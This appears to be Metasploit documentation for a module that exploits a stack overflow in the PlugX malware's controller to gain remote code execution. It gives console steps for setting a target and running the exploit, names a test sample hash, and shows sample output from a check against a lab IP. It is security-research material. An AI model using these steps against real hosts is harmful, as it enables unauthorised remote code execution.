99546330f1
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained. ## Verification Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing. - [ ] use exploit/windows/misc/plugx - [ ] set RHOST [ip of target] - [ ] set target 1 - [ ] exploit - [ ] acknowledge the "PeDecodePacket" message on the target Sample output: ``` msf> use exploit/windows/misc/plugx msf exploit(plugx) > set rhost 192.168.161.128 rhost => 192.168.161.128 msf exploit(plugx) > set target 1 target => 1 msf exploit(plugx) > check [*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00" [*] 192.168.161.128:13579 The target appears to be vulnerable. msf exploit(plugx) >